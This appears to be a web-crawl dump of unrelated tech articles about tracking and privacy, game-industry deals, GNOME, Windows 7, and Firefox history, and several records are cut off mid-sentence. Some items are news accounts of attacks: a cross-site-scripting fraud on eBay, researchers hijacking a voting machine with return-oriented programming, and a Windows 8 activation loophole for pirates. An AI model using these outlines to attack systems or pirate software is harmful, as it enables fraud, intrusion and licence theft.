In response to the ever-increasing issues surrounding privacy, EU Law has put in place the e-Privacy Directive. This basically states that no user should be tracked without their consent. You may have noticed pop up boxes that now appear at the top of websites announcing that they use cookies and require you to either click to accept this, or in some cases just continue using the site and that will be seen as a form of consent.
The short explanations very rarely mention anything about third-party cookies and often only appear the first time you visit the site, meaning that if users just continue as normal then they will be tracked in the same way they were before.
To be more informed of how the site will use cookies, you need to click on the privacy policies option that is usually highlighted in the messages. Sometimes you can select which cookies will be used, the BBC website being a good example here.
What you can do to avoid being tracked
For a more permanent solution it would be wise to consider using the ‘Private’ or ‘Incognito’ browsing modes that stop sites from adding permanent cookies or tracking your web history.
Another sensible move is to visit the security settings in your browser of choice and look for the ‘Do Not Track’ or ‘Do not allow third-party cookies’ option. Plug-ins such as Ghostery are available for most browsers and offer an enhanced level of security, while Internet Explorer users can also use the ‘Tracking Protection Lists’ function that enables them to subscribe to lists of known offending sites, and have their browser deny them placing cookies on your machine.
Sadly even these settings can be overcome by something called Device Fingerprinting. Your system is made up of lots of small details - such as browser type, operating system, plugins, and even system fonts - that can be scanned and interrogated to reveal an individual digital ‘fingerprint’ that identifies your machine from any other on the web.
The Electronic Frontier Foundation is a digital rights group which campaigns against these invasions of civil liberties. To illustrate the effectiveness of Device Fingerprinting it set up the Panopticlick website which allows users to see how identifiable their systems really are. We tested our road-worn laptop and were slightly unnerved to discover that out of the 2,287,979 users that had scanned their machines on the site ours was unique and therefore trackable.
Some would argue that the ability for companies to track our interests is a fair price to pay for the services we receive. After all, websites are only offering opportunities for advertisers to pitch at us. Television, radio, and cinema all do the same thing and use demographic profiling to promote certain products at calculated times - hence all the beer and crisp commercials during football coverage.
No-one forces us to use social networks although if you do it will invariably be one of the big three, as you’ve no hope of finding friends on any other. Plus, there are alternatives to all of Google’s offerings. Is it such a bad thing that we are being watched? Well it all depends on who is doing the watching...and why.
The law on privacy
Currently negotiating its way through parliament is the government’s ‘Communications Data Bill’, or ‘Snooping Bill’ as opponents prefer to call it. This radical restructuring of British law would force ISPs to retain communications data for all emails, web browsing, and even mobile phone use in the UK.
The authorities would then be able to access the information in a limited capacity at any time, or in its entirety when granted a warrant. The government is also claiming that it will be able to decode SSL encryption as part of the process.
For a nation that’s already often heralded as the most surveillance-heavy country in the world this seems to many like a step too far. What some privacy campaigners see as the real problem though isn’t necessarily the government prying into our digital lives (although that’s obviously a concern that they rate highly), but rather the fact that so much information about us will be collected and stored, with potentially dangerous consequences.
Most of us would agree that although we might not always like how our elected officials behave, we still have a reasonably accountable government. We could also agree that while companies like Facebook and Google make money from us in a less than transparent manner, they too are not out to harm us in any way. But the fact that they're all intent on assembling hugely detailed data sets about us poses a problem if that information is ever used by organisations or individuals that are not so benign.
In January 2010 Google announced that it had been the victim of a ‘sophisticated cyber attack originating in China’. The hackers had gone after the email addresses of human rights activists, journalists, and some senior US officials. Wikileaks then released leaked cable communications that suggested a senior member of the Chinese Politburo had been involved in the attacks.
Some reports suggested that the motives behind the attack were to identify and locate political dissidents who were speaking out against the government’s human rights records. 2011 saw the rise to prominence of the ‘Hacktivist’, modern day protestors against what they see as abuses of civil liberties or digital freedom.
Among the high-profile victims of groups such as Anonymous and LulzSec are Sony, the US Bureau of Justice, our own Ministry of Justice, the Home Office, several Chinese government sites and even the Vatican...twice. In fact Verizon released figures reporting that over 100 million users’ data had been compromised by the groups in the past year.
Although the motivations of Hacktivists are generally more positive ones, the ease in which they seem to be able to either bring down or infiltrate supposedly secure sites should bring into question the wisdom of having so much personal information stored in one location, undoubtedly attached to the internet.
So what can we do? Well, at the moment the Communications Data Bill isn’t yet law, so contacting your MP would be a good place to start. In fact, getting as many people as possible to contact their MPs would be a better place.
Change your online habits
But a more immediate solution is that you need to be aware that whatever you put online is no longer private. Use tools such as Collusion to monitor who is watching you.
Change your browser security settings to stop these cookies being stored in the first place, and regularly clear out histories and cookies to remote those that slip through the net. Limit the use of location services, resist clicking the ‘Like’ button, and even use a different browser for your social networks entirely.
The more cautious could boot a Linux operating system from a USB flash drive when using public Wi-Fi, or download the new Wi-FI Guard from AVG. In the end, though, the most potent weapon we can use against those who would try to track us and profit from it is an awareness of what might be happening.
Call in the professionals
Allow is a UK company that specialises in helping you manage your online profile. Its new subscription-based plan offers services such as searching the web to see what marketing databases your name appears on and helping remove you from them, a Google Chrome ad-blocking plug-in, and an email tool which randomly generates addresses for filling out forms or subscribing to websites anonymously, but which you can access from the Allow website.
There are also social media tools which analyse your privacy settings to warn you of any dangers to your data, and a profiling service that tells you how potential employers would view your public content. The whole package is new and could well prove useful. Prices are still being finalised, but expect to pay around £6 per month.
A few simple ways to protect yourself
Limit the information you share publicly. If including your birthday in a social network profile, avoid putting the year - this is a key identifier which trackers use to pinpoint you in a crowd of John Smiths.
Use a secondary email address when registering for websites, forums, competitions, or shopping. Hotmail and Yahoo offer free accounts which are quick to set up.
Use one browser for general web-activities and another for more sensitive information. Also avoid the ‘Like’ or ‘+1’ buttons on sites.
Change your passwords regularly and don’t use the same one on all your accounts. Use a password manager so you don't have to remember them all.
Make sure any browser you use has the Privacy settings switched on. Generally their default setting is 'off'.
The internet is growing up and maturing into a stunningly powerful tool and an amazing place to explore. Like any scene of great adventure there are a few dangers to negotiate along the way.
We shouldn’t let the fear of a Big Brother state or shadowy data brokers deny us the advantages of services like Google or Facebook, and if we’re careful to limit the important data we share then we should be able to protect ourselves in some measure.
Ryan Merkley from Mozilla sums it up rather well, "Tracking is a complicated issue, and a no-tracking universe probably isn't the answer. We want users to be informed and in control of their web experience: the more they know, the less likely anyone can track them without their knowledge. In the long run, informed and empowered users has always been the best thing for the web."
Tags: Security,
Best Advent calendar apps 2015
How to downgrade from iOS 9 to iOS 8: Uninstall iOS 9 & reinstall iOS 8
Johnyboy said: Comments,Johnyboy,With governments trying to obtain all this information about people they do not like and their increasing ability to wipe anyone out by remotely controlled "drone" it may soon be advisable to reign in our thoughts for fear of an untimely death perpetrated from anywhere in the world. Just look at the US and their (to them) legalised murder in Pakistan. Even this missive will probably stored and could be searched in the future by keywords.
Condom said: Comments,Condom,While reading this I notice that my add blocker was showing 17 organisations were trying to track me. It tells me it has blocked them but who really knows? | 计算机 |
2015-48/3682/en_head.json.gz/1582 | Join Date Jan 2006 Posts 1,755 EA buying BioWare/Pandemic for $860M
Update: Superdeveloper scooped up by megapublisher for a staggering sum, deal to close in January; deal covers 10 IPs, including Mass Effect, Mercenaries, and unnamed Wii and DS games. A week jam-packed with Nintendo news was overshadowed today by an announcement that sent shockwaves through the North American game industry. Thursday afternoon, top publisher Electronic Arts announced that it will acquire VG Holding Corp., owner of BioWare/Pandemic. VG Holding Corp. was formed in late 2005 when esteemed Canadian role-playing game studio BioWare formed the aforementioned "superdeveloper" with Californian shop Pandemic Studios. The union was funded by Elevation Partners, a venture capital firm with rock star Bono on its board, and brokered by then-Elevation board member John Riccitiello, who became BioWare/Pandemic's CEO. At the time, the deal was seen as a break from the traditional developer-publisher relationship, which sees the former beholden to the latter for funding. However, when Riccitiello returned to his old job as EA CEO, many wondered if the move might presage a takeover bid of BioWare/Pandemic. These suspicions were further raised when EA agreed to distribute the Pandemic shooter Mercenaries 2: World in Flames under its EA Partners program. When the BioWare/Pandemic deal was announced, Elevation made much of the fact the union represented a "combined investment" of more than $300 million, including future funding. Today, the company got a massive return on said investment, with EA paying $620 million in cash to the stockholders of VG Holding Corp. In addition, the publisher will issue an additional $155 million in equity to unidentified VG Holding employees, as well as assume $50 million in outstanding VG stock options, and will lend VG $35 million to fund the transition. In return for paying a princely sum, EA becomes the owner of both BioWare's and Pandemic's original properties. Jade Empire, Mass Effect, and Dragon Age are among BioWare's original IP, which does not include such licensed hits as the Dungeons and Dragons-based Neverwinter Nights, Star Wars: Knights of the Old Republic, or the DS Sonic RPG. BioWare is also working on an unnamed massively multiplayer online role-playing game. Pandemic is best known for the Full Spectrum Warrior and Mercenaries series, as well as the THQ-owned Destroy All Humans! and LucasArts-owned Star Wars: Battlefront franchises. However, EA was relatively cagey about which BioWare/Pandemic games will become EA properties. The announcement only mentioned one BioWare (Mass Effect) and two Pandemic games (Saboteur, Mercenaries) by name. However, it did say the two studios have "10 franchises under development, including six wholly owned games." Pending regulatory approval, EA's takeover of BioWare/Pandemic will be final on January 2008. Both studios will become part of the EA Games division, run by Frank Gibeau, with Greg Zeschuk, and Ray Muzyka continuing to run BioWare, and Andrew Goldman, Josh Resnick, and Greg Borrud staying in charge of Pandemic. The two studios employ 800 people in Los Angeles; Austin; Edmonton; and Brisbane, Australia. [UPDATE] In a conference call with analysts after the announcement, EA executives shed some light on the motivation behind the deal. Besides the impeccable pedigree of both studios, Riccitiello said that the "acquisition fills out a gap in [EA's] genre line-up," specifically the role-playing and action-adventure markets. The executive also cited BioWare's forthcoming MMORPG as a huge opportunity for "further expansion into the MMO space." Although the implication is that the BioWare MMORPG is an original IP, Riccitiello and his associates steered clear of saying so specifically. He did say that the deal will make EA the owner of the Mass Effect, Jade Empire, Mercenaries, Full Spectrum Warrior, and Saboteur properties. The executive also said that EA "expect[s] to bring 10 franchises to market in the next few years; six of which are wholly owned." No mention was made of Dragon Age, BioWare's little-seen fantasy title. Later, Gibeau said that number includes "many titles that have not yet been announced that we will be announcing in the near future." These include "several unannounced titles that are targeted both at the Wii and DS." The two studios' combined operations are expected to yield around four or five games each year for the next three fiscal years. On the financial side, EA CFO Warren Jenson said that that he expects games from the two studios to generate over $300 million in annual income during EA's 2009 and 2010 fiscal years. (EA's 2009 fiscal year begins on April 1, 2008.) He later said that number would increase once the BioWare MMORPG launches "in the back half" of that period. More PlayStation 3 News... | 计算机 |
2015-48/3682/en_head.json.gz/1683 | Sony Pictures Imageworks
Join us on Facebook on Twitter on YouTube About
Press Breaks
newsroom/
LUCASFILM AND SONY PICTURES IMAGEWORKS RELEASE ALEMBIC 1.1
ALEMBIC is an open source exchange format that is becoming the industry standard for exchanging animated computer graphics between content creation software packages.LOS ANGELES, CA., August 5, 2012 - Alembic 1.1, the open source project jointly developed by Sony Pictures Imageworks (SPI) and Lucasfilm Ltd. released its newest improvements and updates at this year's ACM SIGGRAPH Conference.Joint development of Alembic was first announced at SIGGRAPH 2010 and Alembic 1.0 was released to the public at the 2011 ACM SIGGRAPH Conference in Vancouver. The software focuses on efficiently storing and sharing animation and visual effects scenes across multiple software applications. Since the software's debut last year both companies have integrated the technology into their production pipelines. ILM notably using the software for their work on the 2012 blockbuster The Avengers and Sony Pictures Imageworks on the 2012 worldwide hits Men in Black 3 and The | 计算机 |
2015-48/3682/en_head.json.gz/1938 | Milestone: Phoenix 0.1 released, first version of Firefox
dboswell 4
May 13 2013 September 23, 2002: Phoenix 0.1 is released, the first version of a browser that will be renamed to Firebird and then Firefox
Share in the comments any memories you have of this event, photos of any t-shirts from this period or any other interesting pieces from this time in Mozilla’s history. The information shared here will help us visually create the history of Mozilla as a community.
Categories: History
Caspy7
wrote on May 14, 2013 at 2:11 am:
I think my brain must have deleted that theme from memory.
Or is it possible I was still on the suite and missed it?
wrote on May 14, 2013 at 12:12 pm:
The start of Firefox (originally called mozilla/browser, then Phoenix, then Firebird, then Firefox) happened because various key hackers in Mozilla (some of whom were Netscape employees) were fed up of the control Netscape exercised over the Mozilla suite – particularly in terms of the UI, but also the design-by-committee kitchen-sink feature list. The original group as I remember it were: Dave Hyatt, Blake Ross, Pierre Chanial, Ian Hickson and Asa Dotzler. Checkin rights to their part of the tree were not available to anyone else, although patches would be considered. Hixie wrote an extremely unapologetic FAQ on this point (which I’d like to find a copy of, but can’t at the moment), which led to me referring (perhaps unfairly) to their development process in an email to Brendan as “arrogant cathedral-style”.
Our habit of choosing already-taken names for our products began around this time. Phoenix was the name of an open source Java Server framework and of a mail client . (Chimera, which became Camino, was actually the name of an existing _browser_. which lived at http://www.chimera.org at the time, and might have been the same as this one: . It has been suggested that Dave Hyatt’s naming research was a little… perfunctory.) Amusingly enough, I have an email from shaver which says “It’s way, way [too] late to be changing the name of our Phoenix”. This was before we changed it – twice. The final nail in the coffin was an approach from the Phoenix BIOS people because of their Phoenix FirstView Connect product . By December it was clear that a rename was going to be necessary.
Here’s a document that Mozilla staff wrote for a CNet reporter (although she never saw it before writing her article) about Phoenix, which we then agreed to publish somewhere. It’s interesting because of the insight it gives into the direction Mozilla was moving in at the time.
Mozilla.org is hosting a small, experimental project exploring development of a cross-platform, XUL and Gecko-based stand-alone browser application. The project is known as Phoenix. Phoenix is roughly analogous to the Chimera project, which mozilla.org is also hosting. Chimera is a new browser for the Macintosh platform built using Gecko and a native toolkit for the Macintosh to give Mac users the native look and feel they so desire. Phoenix is our stand-alone browser experiment for Linux and Windows. We don’t yet know how much effort will go into Phoenix or whether it will produce interesting results. We’re interested in this project because:
1. Phoenix exercises the Mozilla application framework in an illuminating way. We now have an application toolkit which has reached a 1.0 status, and which was created with browser-related projects in mind. What better way to test it out than to iterate once again a build a focused browser application. Our current application suite showcases what can be done to promote integrated applications. A project focusing on using Mozilla technology to create a single, stand-alone browser application may teach us new things. Perhaps we’ll find shortcomings in our XUL 1.0 capabilities. Or perhaps we’ll find that it’s an even better toolkit than we expected.
2. Phoenix explores the idea of decoupling the various applications which create our current application suite. We’ve received requests for a stand-alone browser for quite some time. Now that Mozilla 1.0 has been released, we can accommodate this type of experimentation.
3. Phoenix aims to provide a “layered” approach to building a web browser. In other words, allowing mozilla.org to ship a simple stable base with core functionality, and provide a means for managing extensions and layering in add-ons, so that a user could build up the browser to be as complex as he or she wants. This allows some users to have the range of features found in today’s Mozilla releases (or even more) while also providing a convenient path for those who want a lean, quick, simple browser. 4. It has been proposed by a group of XUL experts who have been leaders in the development of Mozilla’s browser application, and whose creativity we want to encourage.
To do this, we’ve created a separate browser partition in our CVS tree. This will allow the cohort of hackers who proposed this project some room to experiment without affecting either the seamonkey branch or trunk. This is a restricted partition, meaning that it is open only to its designated owners and peers. In other words, CVS write access to the seamonkey tree does not include checkin access to this partition.
Development of the browser application and suite in the CVS tree will not be affected at all. Review, super-review, check-in access, involvement of drivers and other mozilla.org policies will continue without change.
dboswell
wrote on May 14, 2013 at 4:15 pm:
There is more background on the name changes with Phoenix on the Mozilla Firefox – Brand Name FAQ at:
http://www-archive.mozilla.org/projects/firefox/firefox-name-faq.html
In addition to Phoenix and Camino, there were a number of other efforts going on around this time to experiment with different approaches to creating browsers based on Mozilla code. Other browser efforts include Galeon, K-Meleon, SkipStone, Q.Bati, Beonex Communicator and Aphrodite.
I think there was a sense that if ‘one hundred browsers bloomed’ then the best of those experiments could help shape the direction of development and some of these other browser efforts did help inform decisions made with Phoenix.
There’s an article with more information about several of these different browsers at
http://www.oreillynet.com/mozilla/2002/09/12/mozilla_browsers.html
About dboswell David has been involved with Mozilla for over twelve years and serves as a Tour Guide of the community to help people get involved and find the things they are interested in. | 计算机 |
2015-48/3682/en_head.json.gz/2196 | What Is the GNOME Desktop
by Aaron Weber, coauthor of Linux in a Nutshell, 5th Edition
The GNOME desktop is a free, user-friendly desktop environment for Unix and Linux operating systems. It also provides a platform for development of new applications. The latest version, GNOME 2.10, is available for Linux, Solaris, HP-UX, BSD, and Darwin platforms. If you want to try it out, you can download a no-install-necessary LiveCD at torrent.gnome.org, 100 percent free, of course.
This article discusses the following:
The GNOME Desktop and Applications
The GNOME Development Platform
GNOME is a desktop software project, but it's large enough to mean different things to different people. If you're a software user, it's a desktop and some applications. If you're a software developer, it's a platform, toolkit, and community. The core applications consist of the Nautilus file manager, the panel and its associated gadgets called panel applets, the usual complement of accessories (text editor, terminal emulator, calculator, and so on), a few games, and some larger applications like the Evolution mail, calendar, and address book, the Gnucash finance tool, the Rhythmbox music player, and the Totem video player. The development platform consists of a set of libraries and language wrappers that range from the low-level (the glib utility functions and the libxml XML parsing libraries) to buttons and widgets as complex as a Mozilla-based HTML rendering tool--meaning you can write your own web browser in under 100 lines of C#, or a calculator in about 5 lines of Python. The libraries are accompanied by user interface guidelines and application interaction standards, so that developers can do things like insert icons into menus automatically, use the system tray for user notification of background tasks, and even manipulate calendars and other data stores created by other applications. For example, OpenOffice.org can reach out to the Evolution address book for mail-merge data, and the panel clock can show upcoming appointments listed in the Evolution calendar.
The whole effort is coordinated by a nonprofit group known as the GNOME Foundation. The Foundation determines release schedules, chooses standards, and handles the administration of the websites and network services. It also determines what software officially "counts" as part of GNOME. Applications included in GNOME must have free licenses and a basis in GNOME technology, must comply with user interface guidelines, and be generally useful and good--for example, no spam tools are allowed. To make it into an official release, an application must be fully documented, debugged, and packaged before the shipment deadline. Libraries have earlier deadlines, so that they can be part of the development platform. Once part of the platform, libraries must maintain API and binary compatibility for long periods of time after release, so that more applications can be built on top of them. The official set of GNOME applications and libraries is listed at www.gnome.org.
Linux in a Nutshell
By Ellen Siever, Aaron Weber, Stephen Figgins, | 计算机 |
2015-48/3682/en_head.json.gz/2202 | First look at Windows 7’s User Interface
Microsoft has given us a first glimpse as Windows 7. The taskbar has changed …
At PDC today, Microsoft gave the first public demonstration of Windows 7. Until now, the company has been uncharacteristically secretive about its new OS; over the past few months, Microsoft has let on that the taskbar will undergo a number of changes, and that many bundled applications would be unbundled and shipped with Windows Live instead. There have also been occasional screenshots of some of the new applets like Calculator and Paint. Now that the covers are finally off, the scale of the new OS becomes clear. The user interface has undergone the most radical overhaul and update since the introduction of Windows 95 thirteen years ago. First, however, it's important to note what Windows 7 isn't. Windows 7 will not contain anything like the kind of far-reaching architectural modifications that Microsoft made with Windows Vista. Vista brought a new display layer and vastly improved security, but that came at a cost: a significant number of (badly-written) applications had difficulty running on Vista. Applications expecting to run with Administrator access were still widespread when Vista was released, and though many software vendors do a great job, there are still those that haven't updated or fixed their software. Similarly, at its launch many hardware vendors did not have drivers that worked with the new sound or video subsystems, leaving many users frustrated. While windows 7 doesn't undo these architectural changes—they were essential for the long-term health of the platform—it equally hasn't made any more. Any hardware or software that works with Windows Vista should also work correctly with Windows 7, so unlike the transition from XP to Vista, the transition from Vista to 7 won't show any regressions; nothing that used to work will stop working. So, rather than low-level, largely invisible system changes, the work on Windows 7 has focused much more on the user experience. The way people use computers is changing; for example, it's increasingly the case that new PCs are bought to augment existing home machines rather than replacement, so there are more home networks and shared devices. Business users are switching to laptops, with the result that people expect to seamlessly use their (Domain-joined) office PC on their home network. As well as these broader industry trends, Microsoft also has extensive data on how people use its software. Through the Customer Experience Improvement Program (CEIP), an optional, off-by-default feature of many Microsoft programs, the company has learned a great deal about the things that users do. For example, from CEIP data Microsoft knows that 70% of users have between 5 and 15 windows open at any one time, and that most of the time they only actively use one or two of those windows. With this kind of data, Microsoft has streamlined and refined the user experience. The biggest visible result of all this is the taskbar. The taskbar in Windows 7 is worlds apart from the taskbar we've known and loved ever since the days of Chicago. Text descriptions on the buttons are gone, in favor of big icons. The icons can—finally—be rearranged; no longer will restarting an application put all your taskbar icons in the wrong order. The navigation between windows is now two-level; mousing over an icon shows a set of window thumbnails, and clicking the thumbnail switches windows. Right clicking the icons shows a new UI device that Microsoft calls "Jump Lists." They're also found on the Start Menu: Jump lists provide quick access to application features. Applications that use the system API for their Most Recently Used list (the list of recently-used filenames that many apps have in their File menus) will automatically acquire a Jump List containing their most recently used files. There's also an API to allow applications to add custom entries; Media Player, for example, includes special options to control playback. This automatic support for new features is a result of deliberate effort on Microsoft's part. The company wants existing applications to benefit from as many of the 7 features as they can without any developer effort. New applications can extend this automatic support through new APIs to further enrich the user experience. The taskbar thumbnails are another example of this approach. All applications get thumbnails, but applications with explicit support for 7 will be able to add thumbnails on a finer-grained basis. IE8, for instance, has a thumbnail per tab (rather than per window). Window management has also undergone changes. In recognition of the fact that people tend only to use one or two windows concurrently, 7 makes organizing windows quicker and easier. Dragging a window to the top of the screen maximizes it automatically; dragging it off the top of the screen restores it. Dragging a window to the left or right edge of the screen resizes the window so that it takes 50% of the screen. With this, a pair of windows can be quickly docked to each screen edge to facilitate interaction between them. Another common task that 7 improves is "peeking" at windows; switching to a window briefly just to read something within the window but not actually interact with the window. To make this easier, scrubbing the mouse over the taskbar thumbnails will turn every window except the one being pointed at into a glass outline; moving the mouse away will reinstate all the glass windows. As well as being used for peeking at windows, you can also peek at the desktop: Peeking at the desktop is particularly significant, because the desktop is now where gadgets live. Because people are increasingly using laptops, taking up a big chunk of space for the sidebar isn't really viable; Microsoft has responded by scrapping the sidebar and putting the gadgets onto the desktop itself. Gadgets are supposed to provide at-a-glance information; peeking at the desktop, therefore, becomes essential for using gadgets. The taskbar's system tray has also been improved. A common complaint about the tray is that it fills with useless icons and annoying notifications. With 7, the tray is now owned entirely by the user. By default, new tray icons are hidden and invisible; the icons are only displayed if explicitly enabled. The icons themselves have also been streamlined to make common tasks (such as switching wireless networks) easier and faster. The other significant part of the Windows UI is Explorer. Windows 7 introduces a new concept named Libraries. Libraries provide a view onto arbitrary parts of the filesystem with organization optimized for different kinds of files. In use, Libraries feel like a kind of WinFS-lite; they don't have the complex database system underneath, but they do retain the idea of a custom view of your files that's independent of where the files are. These UI changes represent a brave move by the company. The new UI takes the concepts that Windows users have been using for the last 13 years and extends them in new and exciting ways. Windows 7 may not change much under the hood, but the extent of these interface changes makes it clear that this is very much a major release. Expand full story | 计算机 |
2015-48/3682/en_head.json.gz/3287 | 09 March 2009, 12:22
Swindlers using new CSS method attack eBay
Swindlers have apparently managed to manipulate descriptions of goods on eBay so that they can change or overwrite any item numbers and the advertiser's email address. This hasn't just misled bidders: it's thought that eBay's measures to protect against fraudulent auctions have been outsmarted.
The swindlers use a cross-site scripting attack in conjunction with the XML Binding Language (XBL), which allows elements in an HTML document containing scripts, style sheets and other objects to be linked to another web site. However, precisely where the error lies is still unknown.
Although the developer Cefn Hoile has sparked off a discussion in the Firefox bug database about a vulnerability in the browser, an attacker would get nowhere without the ability to link his own code to eBay. It is possible to reload cascading style sheets (CSS) from other Web sites into an advertiser's own auctions, although it shouldn't really be possible to reload JavaScript. Nevertheless, it's reported to be possible to reload and run prohibited scripts by using a certain function.
eBay now claims to have eliminated the problem on its pages, while Firefox's developers are thinking about developing a patch to contain it. However, they point out that this attack doesn't exploit a vulnerability in the browser, nor, for example, does it violate the same-origin policy. On the contrary, they say, the danger of content being embedded from other pages has been known for years, and eBay simply ought to improve its filtering, or checking, of downloaded content.
Other pages that permit the embedding of code and the reloading of CSS are also affected by the problem. Its claimed that Internet Explorer versions 6 and 7 are vulnerable to such attacks.
(trk) « previous | next »
Print Version | Send by email
| Permalink: http://h-online. | 计算机 |
2015-48/3682/en_head.json.gz/3998 | System Applications
Revision as of 10:15, 5 June 2012 by Dsr (Talk | contribs)
This is the wiki for discussions on System Applications in support of the proposed System Applications Working Group, see the draft charter and the [email protected] mailing list.
The aim is to define an run-time environment, security model, and associated APIs for building Web applications that integrate with a host operating system. While this run-time will have substantial overlap with the traditional browser-based run-time environment, it will have some important differences, being focused on Web applications that integrate more strongly with the host platform rather than traditional hosted web sites.
As an example, consider an API to enable access to information in your address book, whether this is stored on your device or in the cloud. For a regular web site, the API should give users explicit control over which information is made available to the web site, rather than giving it free access to everything. A system application API by contrast could be used to create and manage your address book. This requires a higher level of trust in the application code since the API would need to provide free access without the user prompts as required to preserve privacy in the weaker API.
Please subscribe to the public mailing list [email protected]. See the link on that page for details. If you have a W3C Account, you will also be able to edit this wiki. To get a W3C account, fill out the account request form.
In case of further questions, please contact the following:
Dave Raggett <[email protected]>
Note: anyone making a substantive contribution to W3C specifications will be required to commit to the requirements of the W3C Patent Policy.
This is a place holder for adding links to pages describing use cases for system applications APIs.
Retrieved from "http://www.w3.org/wiki/index.php?title=System_Applications&oldid=59402" Navigation menu | 计算机 |
2015-48/3682/en_head.json.gz/4777 | Computer scientists take over electronic voting machine with new programming technique (w/ Video)
August 10, 2009 UC San Diego computer science Ph.D. student Stephen Checkoway clutches a print out demonstrating that his vote-stealing exploit that relied on return-oriented programming successfully took control of the reverse engineered voting machine. Credit: UC San Diego / Daniel Kane
(PhysOrg.com) -- Computer scientists demonstrated that criminals could hack an electronic voting machine and steal votes using a malicious programming approach that had not been invented when the voting machine was designed. The team of scientists from University of California, San Diego, the University of Michigan, and Princeton University employed “return-oriented programming” to force a Sequoia AVC Advantage electronic voting machine to turn against itself and steal votes.
“Voting machines must remain secure throughout their entire service lifetime, and this study demonstrates how a relatively new programming technique can be used to take control of a voting machine that was designed to resist takeover, but that did not anticipate this new kind of malicious programming,” said Hovav Shacham, a professor of computer science at UC San Diego’s Jacobs School of Engineering and an author on the new study presented on August 10, 2009 at the 2009 Electronic Voting Technology Workshop / Workshop on Trustworthy Elections (EVT/WOTE 2009), the premier academic forum for voting security research. In 2007, Shacham first described return-oriented programming, which is a powerful systems security exploit that generates malicious behavior by combining short snippets of benign code already present in the system. This video is not supported by your browser at this time.
Computer scientists led by Hovav Shacham, a UC San Diego professor, hacked an electronic voting machine and stole votes using a malicious programming approach that had not been invented when the voting machine was designed. The computer scientists employed "return-oriented programming" to force a Sequoia AVC Advantage electronic voting machine to turn against itself and steal votes. Credit: UC San Diego Jacobs School of Engineering
The new study demonstrates that return-oriented programming can be used to execute vote-stealing computations by taking control of a voting machine designed to prevent code injection. Shacham and UC San Diego computer science Ph.D. student Stephen Checkoway collaborated with researchers from Princeton University and the University of Michigan on this project. “With this work, we hope to encourage further public dialog regarding what voting technologies can best ensure secure elections and what stop gap measures should be adopted if less than optimal systems are still in use,” said J. Alex Halderman, an electrical engineering and computer science professor at the University of Michigan. The computer scientists had no access to the machine’s source code—or any other proprietary information—when designing the demonstration attack. By using just the information that would be available to anyone who bought or stole a voting machine, the researchers addressed a common criticism made against voting security researchers: that they enjoy unrealistic access to the systems they study. “Based on our understanding of security and computer technology, it looks like paper-based elections are the way to go. Probably the best approach would involve fast optical scanners reading paper ballots. These kinds of paper-based systems are amenable to statistical audits, which is something the election security research community is shifting to,” said Shacham. “You can actually run a modern and efficient election on paper that does not look like the Florida 2000 Presidential election,” said Shacham. “If you are using electronic voting machines, you need to have a separate paper record at the very least.” Last year, Shacham, Halderman and others authored a paper entitled “You Go to Elections with the Voting System You have: Stop-Gap Mitigations for Deployed Voting Systems” that was presented at the 2008 Electronic Voting Technology Workshop.”
“This research shows that voting machines must be secure even against attacks that were not yet invented when the machines were designed and sold. Preventing not-yet-discovered attacks requires an extraordinary level of security engineering, or the use of safeguards such as voter-verified paper ballots,” said Edward Felten, an author on the new study; Director of the Center for Information Technology Policy; and Professor of Computer Science and Public Affairs at Princeton University. Return-Oriented Programming Demonstrates Voting Machine Vulnerabilities To take over the voting machine, the computer scientists found a flaw in its software that could be exploited with return-oriented programming. But before they could find a flaw in the software, they had to reverse engineer the machine’s software and its hardware—without the benefit of source code. Princeton University computer scientists affiliated with the Center for Information Technology Policy began by reverse engineering the hardware of a decommissioned Sequoia AVC Advantage electronic voting machine, purchased legally through a government auction. J. Alex Halderman—an electrical engineering and computer science professor at the University of Michigan (who recently finished his Ph.D. in computer science at Princeton) and Ariel Feldman—a Princeton University computer science Ph.D. student, reverse-engineered the hardware and documented its behavior. It soon became clear to the researchers that the voting machine had been designed to reject any injected code that might be used to take over the machine. When they learned of Shacham’s return-oriented programming approach, the UC San Diego computer scientists were invited to take over the project. Stephen Checkoway, the computer science Ph.D. student at UC San Diego, did the bulk of the reverse engineering of the voting machine’s software. He deciphered the software by reading the machine’s read-only memory. Simultaneously, Checkoway extended return-oriented programming to the voting machine’s processor architecture, the Z80. Once Checkoway and Shacham found the flaw in the voting machine’s software—a search which took some time—they were ready to use return-oriented programming to expose the machine’s vulnerabilities and steal votes. The computer scientists crafted a demonstration attack using return-oriented programming that successfully took control of the reverse engineered software and hardware and changed vote totals. Next, Shacham and Checkoway flew to Princeton and proved that their demonstration attack worked on the actual voting machine, and not just the simulated version that the computer scientists built. The computer scientists showed that an attacker would need just a few minutes of access to the machine the night before the election in order to take it over and steal votes the following day. The attacker introduces the demonstration attack into the machine through a cartridge with maliciously constructed contents that is inserted into an unused port in the machine. The attacker navigates the machine’s menus to trigger the vulnerability the researchers found. Now, the malicious software controls the machine. The attacker can, at this point, remove the cartridge, turn the machine’s power switch to the “off” position, and leave. Everything appears normal, but the attacker’s software is silently at work. When poll workers enter in the morning, they normally turn this type of voting machine on. At this point, the exploit would make the machine appear to turn back on, even though it was never actually turned off. “We overwrote the computer’s memory and state so it does what we want it to do, but if y | 计算机 |
2015-48/3682/en_head.json.gz/5225 | Posted Microsoft loophole mistakingly gives pirates free Windows 8 Pro license keys By
Looking for a free copy of Windows 8 Pro? An oversight in Microsoft’s Key Management System – made public by Reddit user noveleven – shows that with just a bit of work, anyone can access a Microsoft-approved product key and activate a free copy of Windows 8 Pro.
The problem is in the Key Management System. Microsoft uses the KMS as part of its Volume Licensing system, which is meant to help corporate IT people remotely activate Windows 8 on a local network. The Achilles’ heel of the setup, according to ExtremeTech, is that you can make your own KMS server, which can be used to partially activate the OS. That approach requires reactivation every 180 days, though, so it’s not a practical system.
